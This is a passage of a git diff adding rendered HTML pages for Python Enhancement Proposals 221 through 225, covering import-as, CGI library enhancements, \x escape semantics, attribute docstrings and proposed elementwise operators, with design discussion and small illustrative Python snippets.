This PEP has been accepted, and the suggested code change has been +checked in. The patch can still be found in the SourceForge patch +manager [1]. Currently, a NAME field is used in the grammar rather +than a bare string, to avoid the keyword issue. It introduces a +new bytecode, IMPORT_STAR, which performs the from module import +* behaviour, and changes the behaviour of the IMPORT_FROM +bytecode so that it loads the requested name (which is always a +single name) onto the stack, to be subsequently stored by a STORE +opcode. As a result, all names explicitly imported now follow the +global directives.

+

The special case of from module import * remains a special case, +in that it cannot accommodate an as clause, and that no STORE +opcodes are generated; the objects imported are loaded directly +into the local namespace. This also means that names imported in +this fashion are always local, and do not follow the global +directive.

+

An additional change to this syntax has also been suggested, to +generalize the expression given after the as clause. Rather +than a single name, it could be allowed to be any expression that +yields a valid l-value; anything that can be assigned to. The +change to accommodate this is minimal, as the patch [2] proves, and +the resulting generalization allows a number of new constructs +that run completely parallel with other Python assignment +constructs. However, this idea has been rejected by Guido, as +“hypergeneralization”.

+
+ +
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0221.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0222/index.html b/pep-0222/index.html
new file mode 100644
index 00000000000..1d07d2eb594
--- /dev/null
+++ b/pep-0222/index.html
@@ -0,0 +1,367 @@
+PEP 222 – Web Library Enhancements | peps.python.org
+
+

+
+
+

PEP 222 – Web Library Enhancements

+
+
Author:
+
A.M. Kuchling <amk at amk.ca>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
18-Aug-2000
+
Python-Version:
+
2.1
+
Post-History:
+
22-Dec-2000
+
+
+
+
+
+

Abstract

+

This PEP proposes a set of enhancements to the CGI development +facilities in the Python standard library. Enhancements might be +new features, new modules for tasks such as cookie support, or +removal of obsolete code.

+

The original intent was to make improvements to Python 2.1. +However, there seemed little interest from the Python community, +and time was lacking, so this PEP has been deferred to some future +Python release.

+
+
+

Open Issues

+

This section lists changes that have been suggested, but about +which no firm decision has yet been made. In the final version of +this PEP, this section should be empty, as all the changes should +be classified as accepted or rejected.

+

cgi.py: We should not be told to create our own subclass just so +we can handle file uploads. As a practical matter, I have yet to +find the time to do this right, so I end up reading cgi.py’s temp +file into, at best, another file. Some of our legacy code actually +reads it into a second temp file, then into a final destination! +And even if we did, that would mean creating yet another object +with its __init__ call and associated overhead.

+

cgi.py: Currently, query data with no = are ignored. Even if +keep_blank_values is set, queries like ...?value=&... are +returned with blank values but queries like ...?value&... are +completely lost. It would be great if such data were made +available through the FieldStorage interface, either as entries +with None as values, or in a separate list.

+

Utility function: build a query string from a list of 2-tuples

+
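A sketch of such a helper, using urllib's standard quoting (the name build_query is invented here):

import urllib

def build_query(pairs):
    "Build a query string from a list of 2-tuples."
    return '&'.join(['%s=%s' % (urllib.quote_plus(str(name)),
                                urllib.quote_plus(str(value)))
                     for (name, value) in pairs])

# build_query([('q', 'python peps'), ('page', 2)])  ->  'q=python+peps&page=2'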

Dictionary-related utility classes: NoKeyErrors (returns an empty +string, never a KeyError), PartialStringSubstitution (returns +the original key string, never a KeyError)

+
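These could be sketched roughly as follows (names taken from the text above; UserDict keeps the sketch usable on pre-2.2 Pythons, where dict cannot be subclassed):

import UserDict

class NoKeyErrors(UserDict.UserDict):
    "Missing keys yield an empty string, never a KeyError."
    def __getitem__(self, key):
        return self.data.get(key, '')

class PartialStringSubstitution(UserDict.UserDict):
    "Missing keys yield the original key string, never a KeyError."
    def __getitem__(self, key):
        return self.data.get(key, key)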
+
+

New Modules

+

This section lists details about entire new packages or modules +that should be added to the Python standard library.

+
    +
  • fcgi.py: A new module adding support for the FastCGI protocol. Robin Dunn’s code needs to be ported to Windows, though.
+
+
+

Major Changes to Existing Modules

+

This section lists details of major changes to existing modules, +whether in implementation or in interface. The changes in this +section therefore carry greater degrees of risk, either in +introducing bugs or a backward incompatibility.

+

The cgi.py module would be deprecated. (XXX A new module or +package name hasn’t been chosen yet: ‘web’? ‘cgilib’?)

+
+
+

Minor Changes to Existing Modules

+

This section lists details of minor changes to existing modules. +These changes should have relatively small implementations, and +have little risk of introducing incompatibilities with previous +versions.

+
+
+

Rejected Changes

+

The changes listed in this section were proposed for Python 2.1, +but were rejected as unsuitable. For each rejected change, a +rationale is given describing why the change was deemed +inappropriate.

+
    +
  • An HTML generation module is not part of this PEP. Several such modules exist, ranging from HTMLgen’s purely programming interface to ASP-inspired simple templating to DTML’s complex templating. There’s no indication of which templating module to enshrine in the standard library, and that probably means that no module should be so chosen.
  • cgi.py: Allowing a combination of query data and POST data. This doesn’t seem to be standard at all, and therefore is dubious practice.
+
+
+

Proposed Interface

+

XXX open issues: naming convention (studlycaps or +underline-separated?); need to look at the cgi.parse*() functions +and see if they can be simplified, too.

+

Parsing functions: carry over most of the parse* functions from +cgi.py

+
# The Response class borrows most of its methods from Zope's
+# HTTPResponse class.
+
+class Response:
+    """
+    Attributes:
+    status: HTTP status code to return
+    headers: dictionary of response headers
+    body: string containing the body of the HTTP response
+    """
+
+    def __init__(self, status=200, headers={}, body=""):
+        pass
+
+    def setStatus(self, status, reason=None):
+        "Set the numeric HTTP response code"
+        pass
+
+    def setHeader(self, name, value):
+        "Set an HTTP header"
+        pass
+
+    def setBody(self, body):
+        "Set the body of the response"
+        pass
+
+    def setCookie(self, name, value,
+                  path = '/',
+                  comment = None,
+                  domain = None,
+                  max_age = None,   # "max-age" is not a valid Python identifier
+                  expires = None,
+                  secure = 0
+                  ):
+        "Set a cookie"
+        pass
+
+    def expireCookie(self, name):
+        "Remove a cookie from the user"
+        pass
+
+    def redirect(self, url):
+        "Redirect the browser to another URL"
+        pass
+
+    def __str__(self):
+        "Convert entire response to a string"
+        pass
+
+    def dump(self):
+        "Return a string representation useful for debugging"
+        pass
+
+    # XXX methods for specific classes of error:serverError,
+    # badRequest, etc.?
+
+
+class Request:
+
+    """
+    Attributes:
+
+    XXX should these be dictionaries, or dictionary-like objects?
+    .headers : dictionary containing HTTP headers
+    .cookies : dictionary of cookies
+    .fields  : data from the form
+    .env     : environment dictionary
+    """
+
+    def __init__(self, environ=os.environ, stdin=sys.stdin,
+                 keep_blank_values=1, strict_parsing=0):
+        """Initialize the request object, using the provided environment
+        and standard input."""
+        pass
+
+    # Should people just use the dictionaries directly?
+    def getHeader(self, name, default=None):
+        pass
+
+    def getCookie(self, name, default=None):
+        pass
+
+    def getField(self, name, default=None):
+        "Return field's value as a string (even if it's an uploaded file)"
+        pass
+
+    def getUploadedFile(self, name):
+        """Returns a file object that can be read to obtain the contents
+        of an uploaded file.  XXX should this report an error if the
+        field isn't actually an uploaded file?  Or should it wrap
+        a StringIO around simple fields for consistency?
+        """
+
+    def getURL(self, n=0, query_string=0):
+        """Return the URL of the current request, chopping off 'n' path
+        components from the right.  Eg. if the URL is
+        "http://foo.com/bar/baz/quux", n=2 would return
+        "http://foo.com/bar".  Does not include the query string (if
+        any)
+        """
+
+    def getBaseURL(self, n=0):
+        """Return the base URL of the current request, adding 'n' path
+        components to the end to recreate more of the whole URL.
+
+        Eg. if the request URL is
+        "http://foo.com/q/bar/baz/qux", n=0 would return
+        "http://foo.com/", and n=2 "http://foo.com/q/bar".
+
+        Returned URL does not include the query string, if any.
+        """
+
+    def dump(self):
+        "String representation suitable for debugging output"
+        pass
+
+    # Possibilities?  I don't know if these are worth doing in the
+    # basic objects.
+    def getBrowser(self):
+        "Returns Mozilla/IE/Lynx/Opera/whatever"
+
+    def isSecure(self):
+        "Return true if this is an SSLified request"
+
+
+# Module-level function
+def wrapper(func, logfile=sys.stderr):
+    """
+    Calls the function 'func', passing it the arguments
+    (request, response, logfile).  Exceptions are trapped and
+    sent to the file 'logfile'.
+    """
+    # This wrapper will detect if it's being called from the command-line,
+    # and if so, it will run in a debugging mode; name=value pairs
+    # can be entered on standard input to set field values.
+    # (XXX how to do file uploads in this syntax?)
+
+
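For illustration, here is a minimal, hypothetical fill-in of the Response skeleton above, showing one way the documented attributes and the __str__ serialization could fit together. The "Status:" header form and the dict-based header store are assumptions of this sketch, not part of the PEP:

class Response:
    """Hypothetical minimal version of the skeleton above."""

    def __init__(self, status=200, headers=None, body=""):
        self.status = status
        self.headers = dict(headers or {})
        self.body = body

    def __str__(self):
        # One plausible CGI-style serialization; the exact wire format
        # is not specified by the PEP.
        lines = ["Status: %d" % self.status]
        lines.extend("%s: %s" % item for item in sorted(self.headers.items()))
        return "\r\n".join(lines) + "\r\n\r\n" + self.body

r = Response(headers={"Content-Type": "text/plain"}, body="hello")
print(str(r))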
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0222.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0223/index.html b/pep-0223/index.html new file mode 100644 index 00000000000..f347a90d78b --- /dev/null +++ b/pep-0223/index.html @@ -0,0 +1,331 @@ + + + + + + + + PEP 223 – Change the Meaning of \x Escapes | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 223 – Change the Meaning of \x Escapes

+
+
Author:
+
Tim Peters <tim.peters at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
20-Aug-2000
+
Python-Version:
+
2.0
+
Post-History:
+
23-Aug-2000
+
+
+
+
Table of Contents +
+
+

Abstract

+

Change \x escapes, in both 8-bit and Unicode strings, to consume +exactly the two hex digits following. The proposal views this as +correcting an original design flaw, leading to clearer expression +in all flavors of string, a cleaner Unicode story, better +compatibility with Perl regular expressions, and with minimal risk +to existing code.

+
+
+

Syntax

+

The syntax of \x escapes, in all flavors of non-raw strings, becomes

+
\xhh
+
+
+

where h is a hex digit (0-9, a-f, A-F). The exact syntax in 1.5.2 is +not clearly specified in the Reference Manual; it says

+
\xhh...
+
+
+

implying “two or more” hex digits, but one-digit forms are also +accepted by the 1.5.2 compiler, and a plain \x is “expanded” to +itself (i.e., a backslash followed by the letter x). It’s unclear +whether the Reference Manual intended either of the 1-digit or +0-digit behaviors.

+
+
+

Semantics

+

In an 8-bit non-raw string,

+
\xij
+
+
+

expands to the character

+
chr(int(ij, 16))
+
+
+

Note that this is the same as in 1.6 and before.

+

In a Unicode string,

+
\xij
+
+
+

acts the same as

+
\u00ij
+
+
+

i.e. it expands to the obvious Latin-1 character from the initial +segment of the Unicode space.

+
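This equivalence can be checked directly in modern Python, where the rule proposed here still holds:

assert "\xe9" == "\u00e9"   # \xhh is the Latin-1 initial segment of Unicode
assert ord("\x41") == 0x41 and "\x41" == "A"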

An \x not followed by at least two hex digits is a compile-time error, +specifically ValueError in 8-bit strings, and UnicodeError (a subclass +of ValueError) in Unicode strings. Note that if an \x is followed by +more than two hex digits, only the first two are “consumed”. In 1.6 +and before all but the last two were silently ignored.

+
+
+

Example

+

In 1.5.2:

+
>>> "\x123465"  # same as "\x65"
+'e'
+>>> "\x65"
+'e'
+>>> "\x1"
+'\001'
+>>> "\x\x"
+'\\x\\x'
+>>>
+
+
+

In 2.0:

+
>>> "\x123465" # \x12 -> \022, "3456" left alone
+'\0223456'
+>>> "\x65"
+'e'
+>>> "\x1"
+[ValueError is raised]
+>>> "\x\x"
+[ValueError is raised]
+>>>
+
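The 2.0 behavior shown above survives unchanged in modern Python, except that the error now surfaces at compile time as a SyntaxError rather than a bare ValueError; a small self-check, assuming Python 3:

assert "\x123465" == "\x12" + "3465"   # exactly two hex digits are consumed
assert "\x65" == "e"
try:
    eval(r'"\x1"')                     # fewer than two hex digits following \x
except SyntaxError as exc:
    print("rejected as specified:", exc)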
+
+
+
+

History and Rationale

+

\x escapes were introduced in C as a way to specify variable-width +character encodings. Exactly which encodings those were, and how many +hex digits they required, was left up to each implementation. The +language simply stated that \x “consumed” all hex digits following, +and left the meaning up to each implementation. So, in effect, \x in C +is a standard hook to supply platform-defined behavior.

+

Because Python explicitly aims at platform independence, the \x escape +in Python (up to and including 1.6) has been treated the same way +across all platforms: all except the last two hex digits were +silently ignored. So the only actual use for \x escapes in Python was +to specify a single byte using hex notation.

+

Larry Wall appears to have realized that this was the only real use for +\x escapes in a platform-independent language, as the proposed rule for +Python 2.0 is in fact what Perl has done from the start (although you +need to run in Perl -w mode to get warned about \x escapes with fewer +than 2 hex digits following – it’s clearly more Pythonic to insist on +2 all the time).

+

When Unicode strings were introduced to Python, \x was generalized so +as to ignore all but the last four hex digits in Unicode strings. +This caused a technical difficulty for the new regular expression engine: +SRE tries very hard to allow mixing 8-bit and Unicode patterns and +strings in intuitive ways, and it no longer had any way to guess what, +for example, r"\x123456" should mean as a pattern: is it asking to match +the 8-bit character \x56 or the Unicode character \u3456?

+

There are hacky ways to guess, but it doesn’t end there. The ISO C99 +standard also introduces 8-digit \U12345678 escapes to cover the entire +ISO 10646 character space, and it’s also desired that Python 2 support +that from the start. But then what are \x escapes supposed to mean? +Do they ignore all but the last eight hex digits then? And if less +than 8 following in a Unicode string, all but the last 4? And if less +than 4, all but the last 2?

+

This was getting messier by the minute, and the proposal cuts the +Gordian knot by making \x simpler instead of more complicated. Note +that the 4-digit generalization to \xijkl in Unicode strings was also +redundant, because it meant exactly the same thing as \uijkl in Unicode +strings. It’s more Pythonic to have just one obvious way to specify a +Unicode character via hex notation.

+
+
+

Development and Discussion

+

The proposal was worked out among Guido van Rossum, Fredrik Lundh and +Tim Peters in email. It was subsequently explained and discussed on +Python-Dev under subject “Go x yourself” [1], starting 2000-08-03. +Response was overwhelmingly positive; no objections were raised.

+
+
+

Backward Compatibility

+

Changing the meaning of \x escapes does carry risk of breaking existing +code, although no instances of incompatibility have yet been discovered. +The risk is believed to be minimal.

+

Tim Peters verified that, except for pieces of the standard test suite +deliberately provoking end cases, there are no instances of \xabcdef... +with fewer or more than 2 hex digits following, in either the Python +CVS development tree, or in assorted Python packages sitting on his +machine.

+
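A rough sketch of the kind of scan described, assuming modern Python: a simple regular expression flags \x escapes followed by fewer or more than two hex digits (naively, so it will also fire inside comments and raw strings):

import re
import sys

# Matches \x followed by three-or-more hex digits, or by fewer than two.
SUSPECT = re.compile(r'\\x(?:[0-9a-fA-F]{3,}|[0-9a-fA-F]?(?![0-9a-fA-F]))')

def scan(path):
    text = open(path, encoding="utf-8", errors="replace").read()
    for match in SUSPECT.finditer(text):
        print("%s: offset %d: %r" % (path, match.start(), match.group()))

if __name__ == "__main__":
    for name in sys.argv[1:]:
        scan(name)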

It’s unlikely there are any with fewer than 2, because the Reference +Manual implied they weren’t legal (although this is debatable!). If +there are any with more than 2, Guido is ready to argue they were buggy +anyway <0.9 wink>.

+

Guido reported that the O’Reilly Python books already document that +Python works the proposed way, likely due to their Perl editing +heritage (as above, Perl worked (very close to) the proposed way from +its start).

+

Finn Bock reported that what JPython does with \x escapes is +unpredictable today. This proposal gives a clear meaning that can be +consistently and easily implemented across all Python implementations.

+
+
+

Effects on Other Tools

+

Believed to be none. The candidates for breakage would mostly be +parsing tools, but the author knows of none that worry about the +internal structure of Python strings beyond the approximation “when +there’s a backslash, swallow the next character”. Tim Peters checked +python-mode.el, the std tokenize.py and pyclbr.py, and the IDLE syntax +coloring subsystem, and believes there’s no need to change any of +them. Tools like tabnanny.py and checkappend.py inherit their immunity +from tokenize.py.

+
+
+

Reference Implementation

+

The code changes are so simple that a separate patch will not be produced. +Fredrik Lundh is writing the code, is an expert in the area, and will +simply check the changes in before 2.0b1 is released.

+
+
+

BDFL Pronouncements

+

Yes, ValueError, not SyntaxError. “Problems with literal interpretations +traditionally raise ‘runtime’ exceptions rather than syntax errors.”

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0223.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0224/index.html b/pep-0224/index.html new file mode 100644 index 00000000000..d3317119840 --- /dev/null +++ b/pep-0224/index.html @@ -0,0 +1,364 @@ + + + + + + + + PEP 224 – Attribute Docstrings | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 224 – Attribute Docstrings

+
+
Author:
+
Marc-André Lemburg <mal at lemburg.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
23-Aug-2000
+
Python-Version:
+
2.1
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Warning

+

This PEP has been rejected.

+

×

+

See Comments from our BDFL for more information.

+

+
+
+

Introduction

+

This PEP describes the “attribute docstring” proposal for Python +2.0. This PEP tracks the status and ownership of this feature. +It contains a description of the feature and outlines changes +necessary to support the feature. The CVS revision history of +this file contains the definitive historical record.

+
+
+

Rationale

+

This PEP proposes a small addition to the way Python currently +handles docstrings embedded in Python code.

+

Python currently only handles the case of docstrings which appear +directly after a class definition, a function definition or as +first string literal in a module. The string literals are added +to the objects in question under the __doc__ attribute and are +from then on available for introspection tools which can extract +the contained information for help, debugging and documentation +purposes.

+

Docstrings appearing in locations other than the ones mentioned +are simply ignored and don’t result in any code generation.

+

Here is an example:

+
class C:
+    "class C doc-string"
+
+    a = 1
+    "attribute C.a doc-string (1)"
+
+    b = 2
+    "attribute C.b doc-string (2)"
+
+
+

The docstrings (1) and (2) are currently being ignored by the +Python byte code compiler, but could obviously be put to good use +for documenting the named assignments that precede them.

+

This PEP proposes to also make use of these cases by proposing +semantics for adding their content to the objects in which they +appear under new generated attribute names.

+

The original idea behind this approach which also inspired the +above example was to enable inline documentation of class +attributes, which can currently only be documented in the class’s +docstring or using comments which are not available for +introspection.

+
+
+

Implementation

+

Docstrings are handled by the byte code compiler as expressions. +The current implementation special cases the few locations +mentioned above to make use of these expressions, but otherwise +ignores the strings completely.

+

To enable use of these docstrings for documenting named assignments (which is the natural way of defining e.g. class attributes), the compiler will have to keep track of the last assigned name and then use this name to assign the content of the docstring to an attribute of the containing object, by means of storing it as a constant which is then added to the object’s namespace during object construction time.

+

In order to preserve features like inheritance and hiding of +Python’s special attributes (ones with leading and trailing double +underscores), a special name mangling has to be applied which +uniquely identifies the docstring as belonging to the name +assignment and allows finding the docstring later on by inspecting +the namespace.

+

The following name mangling scheme achieves all of the above:

+
__doc_<attributename>__
+
+
+

To keep track of the last assigned name, the byte code compiler +stores this name in a variable of the compiling structure. This +variable defaults to NULL. When it sees a docstring, it then +checks the variable and uses the name as basis for the above name +mangling to produce an implicit assignment of the docstring to the +mangled name. It then resets the variable to NULL to avoid +duplicate assignments.

+

If the variable does not point to a name (i.e. is NULL), no +assignments are made. These will continue to be ignored like +before. All classical docstrings fall under this case, so no +duplicate assignments are done.

+

In the above example this would result in the following new class +attributes to be created:

+
C.__doc_a__ == "attribute C.a doc-string (1)"
+C.__doc_b__ == "attribute C.b doc-string (2)"
+
+
+
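Since the compiler support was never accepted, the proposed mangling can only be emulated by hand; a minimal sketch in modern Python of what the lookup side would have looked like:

class C:
    "class C doc-string"
    a = 1
    __doc_a__ = "attribute C.a doc-string (1)"   # written explicitly here
    b = 2
    __doc_b__ = "attribute C.b doc-string (2)"

def attr_doc(cls, name):
    # Look up an attribute docstring via the PEP's mangling scheme;
    # inheritance works because the docstring is a class attribute.
    return getattr(cls, "__doc_%s__" % name, None)

assert attr_doc(C, "a") == "attribute C.a doc-string (1)"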

A patch to the current CVS version of Python 2.0 which implements +the above is available on SourceForge at [1].

+
+
+

Caveats of the Implementation

+

Since the implementation does not reset the compiling structure +variable when processing a non-expression, e.g. a function +definition, the last assigned name remains active until either the +next assignment or the next occurrence of a docstring.

+

This can lead to cases where the docstring and assignment may be +separated by other expressions:

+
class C:
+    "C doc string"
+
+    b = 2
+
+    def x(self):
+        "C.x doc string"
+        y = 3
+        return 1
+
+    "b's doc string"
+
+
+

Since the definition of method “x” currently does not reset the +used assignment name variable, it is still valid when the compiler +reaches the docstring “b’s doc string” and thus assigns the string +to __doc_b__.

+

A possible solution to this problem would be resetting the name +variable for all non-expression nodes in the compiler.

+
+
+

Possible Problems

+

Even though highly unlikely, attribute docstrings could get +accidentally concatenated to the attribute’s value:

+
class C:
+    x = "text" \
+        "x's docstring"
+
+
+

The trailing slash would cause the Python compiler to concatenate +the attribute value and the docstring.

+
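A quick check confirms what actually binds under this accident (the behavior is the same in modern Python):

class C:
    x = "text" \
        "x's docstring"

assert C.x == "textx's docstring"   # adjacent literals concatenate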

A modern syntax highlighting editor would easily make this +accident visible, though, and by simply inserting empty lines +between the attribute definition and the docstring you can avoid +the possible concatenation completely, so the problem is +negligible.

+

Another possible problem is that of using triple quoted strings as +a way to uncomment parts of your code.

+

If there happens to be an assignment just before the start of the +comment string, then the compiler will treat the comment as +docstring attribute and apply the above logic to it.

+

Besides generating a docstring for an otherwise undocumented +attribute there is no breakage.

+
+
+

Comments from our BDFL

+

Early comments on the PEP from Guido:

+
+
I “kinda” like the idea of having attribute docstrings (meaning +it’s not of great importance to me) but there are two things I +don’t like in your current proposal:
    +
  1. The syntax you propose is too ambiguous: as you say, stand-alone string literal are used for other purposes and could suddenly become attribute docstrings.
  2. I don’t like the access method either (__doc_<attrname>__).
+
+

The author’s reply:

+
+
> 1. The syntax you propose is too ambiguous: as you say, stand-alone
+>    string literal are used for other purposes and could suddenly
+>    become attribute docstrings.
+
+
+

This can be fixed by introducing some extra checks in the +compiler to reset the “doc attribute” flag in the compiler +struct.

+
> 2. I don't like the access method either (``__doc_<attrname>__``).
+
+
+

Any other name will do. It will only have to match these +criteria:

+
    +
  • must start with two underscores (to match __doc__)
  • +
  • must be extractable using some form of inspection (e.g. by using +a naming convention which includes some fixed name part)
  • +
  • must be compatible with class inheritance (i.e. should be +stored as attribute)
  • +
+
+

Later on, Guido pronounced on this PEP in March 2001 (on python-dev). Here are his reasons for rejection, mentioned in private mail to the author of this PEP:

+
+

It might be useful, but I really hate the proposed syntax.

+
a = 1
+"foo bar"
+b = 1
+
+
+

I really have no way to know whether “foo bar” is a docstring +for a or for b.

+

+

You can use this convention:

+
a = 1
+__doc_a__ = "doc string for a"
+
+
+

This makes it available at runtime.

+
> Are you completely opposed to adding attribute documentation
+> to Python or is it just the way the implementation works ? I
+> find the syntax proposed in the PEP very intuitive and many
+> other users on c.l.p and in private emails have supported it
+> at the time I wrote the PEP.
+
+
+

It’s not the implementation, it’s the syntax. It doesn’t +convey a clear enough coupling between the variable and the +doc string.

+
+
+ +
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0224.rst

+

Last modified: 2024-04-14 20:08:31 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0225/index.html b/pep-0225/index.html new file mode 100644 index 00000000000..fd8d70ba17c --- /dev/null +++ b/pep-0225/index.html @@ -0,0 +1,847 @@ + + + + + + + + PEP 225 – Elementwise/Objectwise Operators | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 225 – Elementwise/Objectwise Operators

+
+
Author:
+
Huaiyu Zhu <hzhu at users.sourceforge.net>, +Gregory Lielens <gregory.lielens at fft.be>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
19-Sep-2000
+
Python-Version:
+
2.1
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Warning

+

This PEP has been rejected.

+

×

+

The approach in the later PEP 465 was eventually accepted +in lieu of this PEP. The Rejected Ideas +of that PEP explains the rationale in more detail.

+

+
+
+

Introduction

+

This PEP describes a proposal to add new operators to Python which are useful +for distinguishing elementwise and objectwise operations, and summarizes +discussions in the news group comp.lang.python on this topic. See Credits and +Archives section at end. Issues discussed here include:

+
    +
  • Background.
  • +
  • Description of proposed operators and implementation issues.
  • +
  • Analysis of alternatives to new operators.
  • +
  • Analysis of alternative forms.
  • +
  • Compatibility issues
  • +
  • Description of wider extensions and other related ideas.
  • +
+

A substantial portion of this PEP describes ideas that do not go into the +proposed extension. They are presented because the extension is essentially +syntactic sugar, so its adoption must be weighed against various possible +alternatives. While many alternatives may be better in some aspects, the +current proposal appears to be overall advantageous.

+

The issues concerning elementwise-objectwise operations extends to wider areas +than numerical computation. This document also describes how the current +proposal may be integrated with more general future extensions.

+
+
+

Background

+

Python provides six binary infix math operators: + - * / % +** hereafter generically represented by op. They can be overloaded +with new semantics for user-defined classes. However, for objects composed of +homogeneous elements, such as arrays, vectors and matrices in numerical +computation, there are two essentially distinct flavors of semantics. The +objectwise operations treat these objects as points in multidimensional spaces. +The elementwise operations treat them as collections of individual elements. +These two flavors of operations are often intermixed in the same formulas, +thereby requiring syntactical distinction.

+
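For comparison, this is the distinction that Python eventually resolved with PEP 465: ordinary operators stayed elementwise for arrays, and a dedicated infix operator was added for the objectwise (matrix) product. A small sketch, assuming NumPy:

import numpy as np

a = np.array([[1.0, 2.0], [3.0, 4.0]])
b = np.array([[5.0, 6.0], [7.0, 8.0]])

elementwise = a * b   # Hadamard product: operates entry by entry
objectwise = a @ b    # matrix product: treats a and b as linear maps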

Many numerical computation languages provide two sets of math operators. For +example, in MatLab, the ordinary op is used for objectwise operation while +.op is used for elementwise operation. In R, op stands for elementwise +operation while %op% stands for objectwise operation.

+

In Python, there are other methods of representation, some of which already +used by available numerical packages, such as:

+
    +
  • function: mul(a,b)
  • +
  • method: a.mul(b)
  • +
  • casting: a.E*b
  • +
+

In several aspects these are not as adequate as infix operators. More details +will be shown later, but the key points are:

+
    +
  • Readability: Even for moderately complicated formulas, infix operators are +much cleaner than alternatives.
  • +
  • Familiarity: Users are familiar with ordinary math operators.
  • +
  • Implementation: New infix operators will not unduly clutter Python syntax. +They will greatly ease the implementation of numerical packages.
  • +
+

While it is possible to assign current math operators to one flavor of semantics, there are simply not enough infix operators to overload for the other flavor. It is also impossible to maintain visual symmetry between these two flavors if one of them does not contain symbols for ordinary math operators.

+
+
+

Proposed extension

+
    +
  • Six new binary infix operators ~+ ~- ~* ~/ ~% ~** are +added to core Python. They parallel the existing operators + - * +/ % **.
  • +
  • Six augmented assignment operators ~+= ~-= ~*= ~/= ~%= +~**= are added to core Python. They parallel the operators += -= +*= /= %= **= available in Python 2.0.
  • +
  • Operator ~op retains the syntactical properties of operator op, +including precedence.
  • +
  • Operator ~op retains the semantical properties of operator op on +built-in number types.
  • +
  • Operator ~op raises a syntax error on non-number built-in types. This is temporary until the proper behavior can be agreed upon.
  • +
  • These operators are overloadable in classes with names that prepend t (for +tilde) to names of ordinary math operators. For example, __tadd__ and +__rtadd__ work for ~+ just as __add__ and __radd__ work for ++.
  • +
  • As with existing operators, the __r*__() methods are invoked when the +left operand does not provide the appropriate method.
  • +
+

It is intended that one set of op or ~op is used for elementwise +operations, the other for objectwise operations, but it is not specified which +version of operators stands for elementwise or objectwise operations, leaving +the decision to applications.

+
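Since the ~+ syntax was never adopted, its dispatch protocol can only be sketched as a plain function; a hypothetical illustration of the __tadd__/__rtadd__ lookup described above:

def tadd(a, b):
    # Mirrors the proposed ~+ dispatch: try the left operand's __tadd__,
    # then fall back to the right operand's __rtadd__.
    if hasattr(type(a), "__tadd__"):
        return type(a).__tadd__(a, b)
    if hasattr(type(b), "__rtadd__"):
        return type(b).__rtadd__(b, a)
    raise TypeError("unsupported operand types for ~+")

class ElementwiseList(list):
    def __tadd__(self, other):
        return ElementwiseList(x + y for x, y in zip(self, other))
    __rtadd__ = __tadd__

assert tadd(ElementwiseList([1, 2]), [3, 4]) == [4, 6]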

The proposed implementation is to patch several files relating to the +tokenizer, parser, grammar and compiler to duplicate the functionality of +corresponding existing operators as necessary. All new semantics are to be +implemented in the classes that overload them.

+

The symbol ~ is already used in Python as the unary bitwise not operator. +Currently it is not allowed for binary operators. The new operators are +completely backward compatible.

+
+
+

Prototype Implementation

+

Greg Lielens implemented the infix ~op as a patch against Python 2.0b1 +source [1].

+

To allow ~ to be part of binary operators, the tokenizer would treat ~+ as one token. This means that the currently valid expression ~+1 would be tokenized as ~+ 1 instead of ~ + 1. The parser would then treat ~+ as a composite of ~ and +. The effect is invisible to applications.

+

Notes about current patch:

+
    +
  • It does not include ~op= operators yet.
  • +
  • The ~op behaves the same as op on lists, instead of raising +exceptions.
  • +
+

These should be fixed when the final version of this proposal is ready.

+
    +
  • It reserves xor as an infix operator with the semantics equivalent to:
    def __xor__(a, b):
    +    if not b: return a
    +    elif not a: return b
+    else: return 0
    +
    +
    +
  • +
+

This preserves a true value as much as possible, and otherwise preserves the left-hand-side value if possible.

+

This is done so that bitwise operators could be regarded as elementwise +logical operators in the future (see below).

+
+
+

Alternatives to adding new operators

+

The discussions on comp.lang.python and python-dev mailing list explored many +alternatives. Some of the leading alternatives are listed here, using the +multiplication operator as an example.

+
    +
  1. Use function mul(a,b).

    Advantage:

    +
      +
    • No need for new operators.
    • +
    +

    Disadvantage:

    +
      +
    • Prefix forms are cumbersome for composite formulas.
    • +
    • Unfamiliar to the intended users.
    • +
    • Too verbose for the intended users.
    • +
    • Unable to use natural precedence rules.
    • +
    +
  2. Use method call a.mul(b).

    Advantage:

    +
      +
    • No need for new operators.
    • +
    +

    Disadvantage:

    +
      +
    • Asymmetric for both operands.
    • +
    • Unfamiliar to the intended users.
    • +
    • Too verbose for the intended users.
    • +
    • Unable to use natural precedence rules.
    • +
    +
  3. Use shadow classes. For matrix class define a shadow array class accessible through a method .E, so that for matrices a and b, a.E*b would be a matrix object that is elementwise_mul(a,b).

    Likewise define a shadow matrix class for arrays accessible through a method +.M so that for arrays a and b, a.M*b would be an array that is +matrixwise_mul(a,b).

    +

    Advantage:

    +
      +
    • No need for new operators.
    • +
